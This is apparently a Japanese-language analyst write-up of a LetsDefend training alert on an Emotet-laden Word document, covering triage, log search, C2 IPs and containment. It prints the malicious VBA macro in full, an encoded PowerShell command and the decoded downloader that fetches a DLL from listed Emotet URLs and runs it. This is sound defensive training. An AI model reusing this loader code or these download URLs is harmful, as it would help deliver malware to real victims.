LetsDefend level 1 alert SOC109 - Emotet Malware Detected event-id 39
- Details
- playbook
- End
Details
EventID: 39
Event Time: Jan. 1, 2021, 4:45 p.m.
Rule: SOC109 - Emotet Malware Detected
Level: Security Analyst
Source Address 172.16.17.83
Source Hostname Maxim
File Name MES 2020_12_31 S632974.doc
File Hash eee99e6d8ade9463dd206dfbad3485ea
File Size 161.36 Kb
Device Action Allowed
Download (Password:infected): eee99e6d8ade9463dd206dfbad3485ea.zip
playbook
Define Threat Indicator
Answer:Other
Check if the malware is quarantined/cleaned
Device Action Allowed
Answer: Not Quarantined
Analyze Malware
eee99e6d8ade9463dd206dfbad3485ea
VirusTotal 47/62: https://www.virustotal.com/gui/file/70450709057b656283751c362a7b72b9b0232ddd86f8482016ee85947392e27c
Hybrid Analysis: https://www.hybrid-analysis.com/sample/70450709057b656283751c362a7b72b9b0232ddd86f8482016ee85947392e27c/5fefe8368593b70319655413
ANYRUN: https://app.any.run/tasks/5621decd-153d-4982-92c6-e7bddeafde2e/
VirusTotalを見ると多くのベンダーで登録されている既知のマルウェアのようだ。
vbaマクロを実行し、リモートのサーバからファイルを取得している。
このファイルをoletoolsのolevbaで見てみると、
Private Sub Document_open() Rscxe50kzk0uy8c57h End Sub --- Function Rscxe50kzk0uy8c57h() On Error Resume Next mKbjhqs = Yfz878jqfi8emxj8k.StoryRanges.Item(4 / 4) GoTo GgbBEBHp Dim agRmIUza As Object Set agRmIUza = CreateObject("Scripting.FileSystemObject") Dim GgbBEBHp As Object Set GgbBEBHp = agRmIUza.CreateTextFile("K:\hHLZv\tivKHBG.fyEWE") GgbBEBHp.WriteLine " " GgbBEBHp.Close Set agRmIUza = Nothing Set GgbBEBHp = Nothing GgbBEBHp: snahbsd = "]e1r[Sp]e1r[S" Lq83qqs1pfyjio1yve = "]e1r[Sro]e1r[S]e1r[Sce]e1r[Ss]e1r[Ss]e1r[S]e1r[S" GoTo XgvEJCBN Dim QziRLaIvB As Object Set QziRLaIvB = CreateObject("Scripting.FileSystemObject") Dim XgvEJCBN As Object Set XgvEJCBN = QziRLaIvB.CreateTextFile("K:\ngiHBhtC\UfeKFo.VughFHEh") XgvEJCBN.WriteLine " " XgvEJCBN.Close Set QziRLaIvB = Nothing Set XgvEJCBN = Nothing XgvEJCBN: U5loi1_jmnzaqiegq = "]e1r[S:w]e1r[S]e1r[Sin]e1r[S3]e1r[S2]e1r[S_]e1r[S" GoTo hgtMNEDC Dim CZSeKtG As Object Set CZSeKtG = CreateObject("Scripting.FileSystemObject") Dim hgtMNEDC As Object Set hgtMNEDC = CZSeKtG.CreateTextFile("K:\cpFBJFDH\xlJbHCC.QYTeJIEGD") hgtMNEDC.WriteLine " " hgtMNEDC.Close Set CZSeKtG = Nothing Set hgtMNEDC = Nothing hgtMNEDC: H_7tattyau5usczkpn = "w]e1r[Sin]e1r[Sm]e1r[Sgm]e1r[St]e1r[S]e1r[S" GoTo KiKEBuJUJ Dim PTQDJLrW As Object Set PTQDJLrW = CreateObject("Scripting.FileSystemObject") Dim KiKEBuJUJ As Object Set KiKEBuJUJ = PTQDJLrW.CreateTextFile("K:\soeBQFQDw\WMRIMPG.JKyoFAF") KiKEBuJUJ.WriteLine " " KiKEBuJUJ.Close Set PTQDJLrW = Nothing Set KiKEBuJUJ = Nothing KiKEBuJUJ: B0r8pge9ex02he = "]e1r[S" + Mid(Application.Name, 6, 1) + "]e1r[S" GoTo VvbAPGB Dim wHaMWCAF As Object Set wHaMWCAF = CreateObject("Scripting.FileSystemObject") Dim VvbAPGB As Object Set VvbAPGB = wHaMWCAF.CreateTextFile("K:\bzWJHl\KFaka.azsvpH") VvbAPGB.WriteLine " " VvbAPGB.Close Set wHaMWCAF = Nothing Set VvbAPGB = Nothing VvbAPGB: Opoqhvp43yj = H_7tattyau5usczkpn + B0r8pge9ex02he + U5loi1_jmnzaqiegq + snahbsd + Lq83qqs1pfyjio1yve GoTo eNfOI Dim EatwI As Object Set EatwI = CreateObject("Scripting.FileSystemObject") Dim eNfOI As Object Set eNfOI = EatwI.CreateTextFile("K:\rThUJp\jvUYFCcC.bwpqgxnl") eNfOI.WriteLine " " eNfOI.Close Set EatwI = Nothing Set eNfOI = Nothing eNfOI: Z13pi8fctd_bd7 = H_f1l3q4wuv(Opoqhvp43yj) GoTo mttHC Dim ZUSgTSS As Object Set ZUSgTSS = CreateObject("Scripting.FileSystemObject") Dim mttHC As Object Set mttHC = ZUSgTSS.CreateTextFile("K:\tRMsNA\ZxNIJGBC.emQhvJFE") mttHC.WriteLine " " mttHC.Close Set ZUSgTSS = Nothing Set mttHC = Nothing mttHC: Set M3zy0l7te6wcqq4_r = CreateObject(Z13pi8fctd_bd7) GoTo XCtMEEHQH Dim JEnFGGAH As Object Set JEnFGGAH = CreateObject("Scripting.FileSystemObject") Dim XCtMEEHQH As Object Set XCtMEEHQH = JEnFGGAH.CreateTextFile("K:\KUvdSiCG\SWvOUGCM.yuplAASB") XCtMEEHQH.WriteLine " " XCtMEEHQH.Close Set JEnFGGAH = Nothing Set XCtMEEHQH = Nothing XCtMEEHQH: Px4akgkluolo7in096 = Mid(mKbjhqs, (15 / 3), Len(mKbjhqs)) GoTo pHBuBEG Dim gSXBEs As Object Set gSXBEs = CreateObject("Scripting.FileSystemObject") Dim pHBuBEG As Object Set pHBuBEG = gSXBEs.CreateTextFile("K:\TskVJVn\aafpAJrAE.vUXKLFw") pHBuBEG.WriteLine " " pHBuBEG.Close Set gSXBEs = Nothing Set pHBuBEG = Nothing pHBuBEG: GoTo cxLTHBCC Dim aNVjIUF As Object Set aNVjIUF = CreateObject("Scripting.FileSystemObject") Dim cxLTHBCC As Object Set cxLTHBCC = aNVjIUF.CreateTextFile("K:\WJmHGBxDH\atxzHEHY.mWWMoDHPG") cxLTHBCC.WriteLine " " cxLTHBCC.Close Set aNVjIUF = Nothing Set cxLTHBCC = Nothing cxLTHBCC: M3zy0l7te6wcqq4_r.Create H_f1l3q4wuv(Px4akgkluolo7in096), Rzvbvgf_vxrf, I3hfd4821r3zv GoTo pyPIA Dim qhLiwn As Object Set qhLiwn = CreateObject("Scripting.FileSystemObject") Dim pyPIA As Object Set pyPIA = qhLiwn.CreateTextFile("K:\GGDxTNF\IePRJDt.eCBBOz") pyPIA.WriteLine " " pyPIA.Close Set qhLiwn = Nothing Set pyPIA = Nothing pyPIA: GoTo YiaTHFMA Dim LPMlGRFHC As Object Set LPMlGRFHC = CreateObject("Scripting.FileSystemObject") Dim YiaTHFMA As Object Set YiaTHFMA = LPMlGRFHC.CreateTextFile("K:\fFLaGYBH\ZvDXsFT.IXtjnt") YiaTHFMA.WriteLine " " YiaTHFMA.Close Set LPMlGRFHC = Nothing Set YiaTHFMA = Nothing YiaTHFMA: End Function Function H_f1l3q4wuv(H11p8eic2w3zn_) On Error Resume Next GoTo jkZdJG Dim mfixAuM As Object Set mfixAuM = CreateObject("Scripting.FileSystemObject") Dim jkZdJG As Object Set jkZdJG = mfixAuM.CreateTextFile("K:\bVbhWbGD\jTqgJ.GHrZkJCF") jkZdJG.WriteLine " " jkZdJG.Close Set mfixAuM = Nothing Set jkZdJG = Nothing jkZdJG: Bfizqcunyu0 = (H11p8eic2w3zn_) GoTo SeNkICAJ Dim HRDLEVmi As Object Set HRDLEVmi = CreateObject("Scripting.FileSystemObject") Dim SeNkICAJ As Object Set SeNkICAJ = HRDLEVmi.CreateTextFile("K:\AkYbFA\BnmqHkXA.oujVB") SeNkICAJ.WriteLine " " SeNkICAJ.Close Set HRDLEVmi = Nothing Set SeNkICAJ = Nothing SeNkICAJ: P_eiv2i047gos2b = Zh7kypwwff0md33a(Bfizqcunyu0) GoTo ZyJBNBD Dim kIuKr As Object Set kIuKr = CreateObject("Scripting.FileSystemObject") Dim ZyJBNBD As Object Set ZyJBNBD = kIuKr.CreateTextFile("K:\inSuIwND\usjkXC.fwloXI") ZyJBNBD.WriteLine " " ZyJBNBD.Close Set kIuKr = Nothing Set ZyJBNBD = Nothing ZyJBNBD: H_f1l3q4wuv = P_eiv2i047gos2b GoTo qoPKJgV Dim naVxBFJAJ As Object Set naVxBFJAJ = CreateObject("Scripting.FileSystemObject") Dim qoPKJgV As Object Set qoPKJgV = naVxBFJAJ.CreateTextFile("K:\JhzlFCAB\Jfiuz.aptrJGAA") qoPKJgV.WriteLine " " qoPKJgV.Close Set naVxBFJAJ = Nothing Set qoPKJgV = Nothing qoPKJgV: End Function Function Zh7kypwwff0md33a(L34u2dzesgzcfaiwy) Zlnor_53jwsrz = Ziq909ju8euif9uz GoTo HQnFde Dim aNITDI As Object Set aNITDI = CreateObject("Scripting.FileSystemObject") Dim HQnFde As Object Set HQnFde = aNITDI.CreateTextFile("K:\RMIpGDjgI\TjPglA.JFIpEFW") HQnFde.WriteLine " " HQnFde.Close Set aNITDI = Nothing Set HQnFde = Nothing HQnFde: Zh7kypwwff0md33a = Replace(L34u2dzesgzcfaiwy, "]e1r[S", Rnclsjpi29gic5) GoTo UMVjHQHCH Dim gscDYEBhG As Object Set gscDYEBhG = CreateObject("Scripting.FileSystemObject") Dim UMVjHQHCH As Object Set UMVjHQHCH = gscDYEBhG.CreateTextFile("K:\yJFQHkpC\FiUeelAjF.QixxE") UMVjHQHCH.WriteLine " " UMVjHQHCH.Close Set gscDYEBhG = Nothing Set UMVjHQHCH = Nothing UMVjHQHCH: End Function
おそらくこのvbaは次のコマンドを実行している。
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBFAFQALQBpAHQARQBtACAAIAAoACcAdgAnACsAJwBBAHIASQBhACcAKwAnAGIAJwArACcATABFADoAdABJAFMAOAAnACsAJwBDAHEAJwApACAAIAAoAFsAdAB5AFAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADUAfQB7ADQAfQB7ADEAfQB7ADIAfQAiACAALQBmACcAcwAnACwAJwAuAEQASQBSACcALAAnAEUAQwBUAE8AUgB5ACcALAAnAHkAUwB0AGUAbQAnACwAJwBJAE8AJwAsACcALgAnACkAIAAgACkAIAAgADsAIAAgACAAUwBFAHQALQBpAHQAZQBtACAAVgBBAFIAaQBhAEIAbABlADoAOAA1AFkAIAAoAFsAVABZAFAARQBdACgAIgB7ADUAfQB7ADMAfQB7ADIAfQB7ADgAfQB7ADEAfQB7ADAAfQB7ADQAfQB7ADkAfQB7ADcAfQB7ADYAfQAiACAALQBGACAAJwByACcALAAnAC4AUwBlACcALAAnAE0ALgAnACwAJwBUAEUAJwAsACcAVgBJAEMAZQBQAE8AJwAsACcAcwB5AFMAJwAsACcAYQBOAGEARwBlAHIAJwAsACcAVABNACcALAAnAE4AZQBUACcALAAnAEkAbgAnACkAKQAgADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwArACcAdABsACcAKQArACcAeQBDACcAKwAoACcAbwBuAHQAaQBuACcAKwAnAHUAJwApACsAJwBlACcAKQA7ACQARwBtAGwAdABoAHAANwA9ACQAQgA3ADYAQwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUAA0ADYAWAA7ACQAVAAzADcAWQA9ACgAKAAnAEQAJwArACcAMwA1ACcAKQArACcASQAnACkAOwAgACAAJABUAEkAcwA4AEMAcQA6ADoAIgBDAHIARQBgAEEAdABgAEUAZABJAHIAZQBjAGAAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcARwA2ACcAKwAnAFQAJwArACcARgAyAHMAJwApACsAKAAnADIAawAnACsAJwAzAG0AJwApACsAKAAnAEcANgBUACcAKwAnAEoAdwAnACkAKwAnAHcAOQAnACsAJwB3AF8AJwArACcAYgBHACcAKwAnADYAVAAnACkAIAAtAHIARQBQAGwAYQBjAGUAKABbAEMAaABhAFIAXQA3ADEAKwBbAEMAaABhAFIAXQA1ADQAKwBbAEMAaABhAFIAXQA4ADQAKQAsAFsAQwBoAGEAUgBdADkAMgApACkAOwAkAFUAMAA0AFoAPQAoACcARgAnACsAKAAnADUANwAnACsAJwBVACcAKQApADsAIAAoACAAdgBBAFIAaQBBAGIATABlACAAIAA4ADUAeQAgACAALQBWAGEAbAB1AGUATwApADoAOgAiAHMAZQBDAFUAcgBgAGkAYABUAFkAcABSAE8AdABPAGAAYwBPAGwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEoAMwA0AE8APQAoACcAUQAwACcAKwAnADkAQQAnACkAOwAkAFQANAB3ADMAZwBvAHUAIAA9ACAAKAAnAEwAJwArACgAJwBfACcAKwAnADAARQAnACkAKQA7ACQARAAwADUAUQA9ACgAJwBUADIAJwArACcAOABMACcAKQA7ACQATwBkAHcAdQBtAGsAeAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEYAMgBzACcAKwAoACcAMgAnACsAJwBrADMAJwApACsAJwBtAHsAMAB9AEoAdwB3ACcAKwAoACcAOQB3ACcAKwAnAF8AYgAnACkAKwAnAHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAGMASABBAFIAXQA5ADIAKQArACQAVAA0AHcAMwBnAG8AdQArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAEUAMwA3AFEAPQAoACgAJwBFACcAKwAnADkAOAAnACkAKwAnAEgAJwApADsAJABBAHoAZwBsADgAMgBuAD0AKAAoACcAXQBlADEAJwArACcAcgAnACkAKwAoACcAWwAnACsAJwBTADoALwAvACcAKQArACcAZABlACcAKwAnAGMAJwArACgAJwBwACcAKwAnAGEAawAuAGMAJwApACsAJwBvACcAKwAoACcAbQAnACsAJwAvAGMAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAaQBuAC8AZwBVACcAKwAnAC8AQABdACcAKQArACgAJwBlACcAKwAnADEAcgAnACkAKwAnAFsAUwAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAGEAJwArACcAbgAnACkAKwAoACcAZwBlAGwAJwArACcAcwBsACcAKQArACgAJwBsAGkAJwArACcAbQAnACkAKwAoACcAYQAnACsAJwByACcAKwAnAGcAYQBzAC4AYwBvAG0ALwBBACcAKwAnAFUARAAnACkAKwAoACcASQAnACsAJwBPAC8AMwBkACcAKQArACgAJwB3AG0ALwBAACcAKwAnAF0AJwArACcAZQAxACcAKwAnAHIAWwAnACkAKwAoACcAUwAnACsAJwA6AC8ALwBnACcAKQArACgAJwBhAGQAJwArACcAZwAnACkAKwAnAGUAJwArACgAJwB0AGIAJwArACcAYQB5AC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACcALwBsACcAKwAoACcAZQB0AHMAZAAnACsAJwBlACcAKwAnAGEAbAAvAGcAJwArACcAZABGAGoAZgBRAC8AQAAnACkAKwAoACcAXQAnACsAJwBlADEAJwApACsAKAAnAHIAWwBTACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvAGMAcwAnACsAJwBnAGMAYQByAGcAJwArACcAbwAnACsAJwAuAGMAbwBtAC8AYwBvAG4AdABlACcAKwAnAG4AdAAnACkAKwAoACcALwBHAGIALwAnACsAJwBAACcAKwAnAF0AZQAxAHIAJwApACsAJwBbACcAKwAoACcAUwA6AC8AJwArACcALwAnACkAKwAnAGEAJwArACgAJwBhACcAKwAnAGcAegB6ACcAKQArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AJwArACcAdABlACcAKQArACcAbgB0ACcAKwAnAC8ASwAnACsAKAAnAFAAJwArACcALwBAACcAKQArACgAJwBdAGUAJwArACcAMQByAFsAUwBzACcAKwAnADoAJwApACsAKAAnAC8ALwBtAGUAdABhACcAKwAnAGQAJwApACsAJwBvAHIAJwArACgAJwByACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AJwArACcAQQBMAEYAQQAnACkAKwAnAF8AJwArACgAJwBEAEEAJwArACcAVABBAC8AJwApACsAJwBCAHQAJwArACgAJwBmAE0AJwArACcAOAAnACkAKwAoACcASQAnACsAJwBkAC8AQABdAGUAMQAnACsAJwByAFsAJwArACcAUwAnACsAJwBzADoALwAvAHMAJwApACsAJwBlACcAKwAnAG4AJwArACgAJwB0AHUAcgBrACcAKwAnAGUAJwApACsAKAAnAHQAaQAnACsAJwBjAGEAcgBlAHQALgBjAG8AJwArACcAbQAvACcAKwAnAHcAcAAnACsAJwAtAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwB5AE8AJwArACcAbAAvACcAKQApAC4AIgBSAGUAcABgAEwAYABBAGMAZQAiACgAKAAnAF0AJwArACcAZQAxACcAKwAoACcAcgBbACcAKwAnAFMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAHAAbABgAGkAdAAiACgAJABNADAAMQBMACAAKwAgACQARwBtAGwAdABoAHAANwAgACsAIAAkAEcANQA1AFMAKQA7ACQAVQAxADIAWQA9ACgAJwBJAF8AJwArACcAMABJACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAGMAXwB0ADYAcgAgAGkAbgAgACQAQQB6AGcAbAA4ADIAbgApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAcwB5AFMAVABlAG0ALgBOAGUAdAAuAFcARQBiAGMAbABpAGUATgB0ACkALgAiAEQAbwBgAFcATgBMAE8AYQBkAGYASQBgAEwAZQAiACgAJABYAHIAYwBfAHQANgByACwAIAAkAE8AZAB3AHUAbQBrAHgAKQA7ACQARQA3ADAAUAA9ACgAJwBKACcAKwAoACcANAAyACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQATwBkAHcAdQBtAGsAeAApAC4AIgBMAGUATgBnAGAAVABIACIAIAAtAGcAZQAgADMAOQAxADYAMwApACAAewAmACgAJwByAHUAbgBkACcAKwAnAGwAJwArACcAbAAzADIAJwApACAAJABPAGQAdwB1AG0AawB4ACwAKAAnAEMAJwArACgAJwBvAG4AJwArACcAdAAnACkAKwAoACcAcgBvACcAKwAnAGwAXwBSAHUAJwApACsAJwBuACcAKwAoACcARABMACcAKwAnAEwAJwApACkALgAiAHQATwBgAHMAVABgAFIASQBOAEcAIgAoACkAOwAkAEcANgA1AE8APQAoACgAJwBXAF8AJwArACcANAAnACkAKwAnAEYAJwApADsAYgByAGUAYQBrADsAJABUAF8ANABGAD0AKAAnAEQANwAnACsAJwA0AFAAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABWADUANQBPAD0AKAAnAEEAJwArACgAJwA1ACcAKwAnADIAWgAnACkAKQA=
実行しているpowershellのコマンドは、
SET-itEm ('v'+'ArIa'+'b'+'LE:tIS8'+'Cq') ([tyPE]("{0}{3}{5}{4}{1}{2}" -f's','.DIR','ECTORy','yStem','IO','.') ) ; SEt-item VARiaBle:85Y ([TYPE]("{5}{3}{2}{8}{1}{0}{4}{9}{7}{6}" -F 'r','.Se','M.','TE','VICePO','syS','aNaGer','TM','NeT','In')) ;$ErrorActionPreference = (('S'+'ilen'+'tl')+'yC'+('ontin'+'u')+'e');$Gmlthp7=$B76C + [char](64) + $P46X;$T37Y=(('D'+'35')+'I'); $TIs8Cq::"CrE`At`EdIrec`TOrY"($HOME + ((('G6'+'T'+'F2s')+('2k'+'3m')+('G6T'+'Jw')+'w9'+'w_'+'bG'+'6T') -rEPlace([ChaR]71+[ChaR]54+[ChaR]84),[ChaR]92));$U04Z=('F'+('57'+'U')); ( vARiAbLe 85y -ValueO)::"seCUr`i`TYpROtO`cOl" = ('Tl'+('s1'+'2'));$J34O=('Q0'+'9A');$T4w3gou = ('L'+('_'+'0E'));$D05Q=('T2'+'8L');$Odwumkx=$HOME+(('{0}F2s'+('2'+'k3')+'m{0}Jww'+('9w'+'_b')+'{0'+'}') -F[cHAR]92)+$T4w3gou+(('.d'+'l')+'l');$E37Q=(('E'+'98')+'H');$Azgl82n=((']e1'+'r')+('['+'S://')+'de'+'c'+('p'+'ak.c')+'o'+('m'+'/cg')+('i'+'-bin/gU'+'/@]')+('e'+'1r')+'[S'+':'+'/'+('/a'+'n')+('gel'+'sl')+('li'+'m')+('a'+'r'+'gas.com/A'+'UD')+('I'+'O/3d')+('wm/@'+']'+'e1'+'r[')+('S'+'://g')+('ad'+'g')+'e'+('tb'+'ay.')+('co'+'m')+'/l'+('etsd'+'e'+'al/g'+'dFjfQ/@')+(']'+'e1')+('r[S'+'s')+(':'+'//cs'+'gcarg'+'o'+'.com/conte'+'nt')+('/Gb/'+'@'+']e1r')+'['+('S:/'+'/')+'a'+('a'+'gzz')+'.c'+'o'+('m/wp'+'-con'+'te')+'nt'+'/K'+('P'+'/@')+(']e'+'1r[Ss'+':')+('//meta'+'d')+'or'+('r'+'.c')+('om/'+'ALFA')+'_'+('DA'+'TA/')+'Bt'+('fM'+'8')+('I'+'d/@]e1'+'r['+'S'+'s://s')+'e'+'n'+('turk'+'e')+('ti'+'caret.co'+'m/'+'wp'+'-ad')+('min'+'/yO'+'l/'))."Rep`L`Ace"((']'+'e1'+('r['+'S')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])."Spl`it"($M01L + $Gmlthp7 + $G55S);$U12Y=('I_'+'0I');foreach ($Xrc_t6r in $Azgl82n){try{(&('New-O'+'b'+'ject') sySTem.Net.WEbclieNt)."Do`WNLOadfI`Le"($Xrc_t6r, $Odwumkx);$E70P=('J'+('42'+'C'));If ((.('Get-'+'Ite'+'m') $Odwumkx)."LeNg`TH" -ge 39163) {&('rund'+'l'+'l32') $Odwumkx,('C'+('on'+'t')+('ro'+'l_Ru')+'n'+('DL'+'L'))."tO`sT`RING"();$G65O=(('W_'+'4')+'F');break;$T_4F=('D7'+'4P')}}catch{}}$V55O=('A'+('5'+'2Z'))
このスクリプトは、以下のURLから何かを取得しようとしている。
http://decpak.com/cgi-bin/gU/ http://angelsllimargas.com/AUDIO/3dwm/ http://gadgetbay.com/letsdeal/gdFjfQ/ https://csgcargo.com/content/Gb/ http://aagzz.com/wp-content/KP/ https://metadorr.com/ALFA_DATA/BtfM8Id/ https://senturketicaret.com/wp-admin/yOl/
このURLを調べると例えば、
http[:]//decpak.com/cgi-bin/gU/
URLhaus: https://urlhaus.abuse.ch/url/945783/
Emotet!!!
Answer: Malicious
Check If Someone Requested the C2
Log search - 172.16.17.83
172.16.17.83からのアクセスを見る。
# | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|---|
330 | Jan, 01, 2021, 04:41 PM | Proxy | 172.16.17.83 | 14441 | 23.111.174.153 | 80 |
331 | Jan, 01, 2021, 04:42 PM | Proxy | 172.16.17.83 | 15431 | 152.170.79.100 | 80 |
332 | Jan, 01, 2021, 04:43 PM | Proxy | 172.16.17.83 | 23121 | 190.247.139.101 | 80 |
330
URL: http://decpak.com/cgi-bin/gU/ Request Method: GET
331
URL: http://152.170.79.100/076ay2uof/umojx2x1vf1qjjk/hue4e670x/d3eobn8z0k0rp/syaxabx0loj/erz7hayf/ Request Method: GET
332
URL: http://190.247.139.101/i3u3l3e3n96/sow63klj/pkv3runqw/dudwqjl4zg8l7hk6ah6/huulsuajy/nibyefksabf1mz63/ Request Method: GET
先ほど挙げたemotetに関連するサーバへのアクセスを確認した。
また、152.170.79.100と190.247.139.101に関してはVirusTotalで見ると、
152.170.79.100: https://www.virustotal.com/gui/ip-address/152.170.79.100/community
190.247.139.101: https://www.virustotal.com/gui/ip-address/190.247.139.101/community
Emotetと関連するというレポートがある。
Answer: Accessed
Containment
Endpoint - Maxim 172.16.17.83
CMD History
01.01.2021 10:21: ipconfig 01.01.2021 10:22: netsh interface ipv4 show config 01.01.2021 10:23: arp -a
emotetによるネットワークの情報収集か。
Network Connections
01.01.2021 16:21: 172.217.169.174 01.01.2021 16:22: 172.217.169.174 01.01.2021 16:23: 172.217.169.174 01.01.2021 16:42: 152.170.79.100 01.01.2021 16:43: 190.247.139.101
172.217.169.174は問題無さそう。
Add Artifacts
Value | Type | Comment |
---|---|---|
f2d0c66b801244c059f636d08a474079 | MD5 Hash | malicious word file |
https[:]//filetransfer[.]io/data-package/UR2whuBv/download | URL Address | file sending service |
End
近年のmalwareは、やはりemotetが流行りか。ANYRUNへの2021年のアップロードは、njRATが多かったようだが実際のマルウェア感染の件数や被害としてはemotetが多いイメージがある。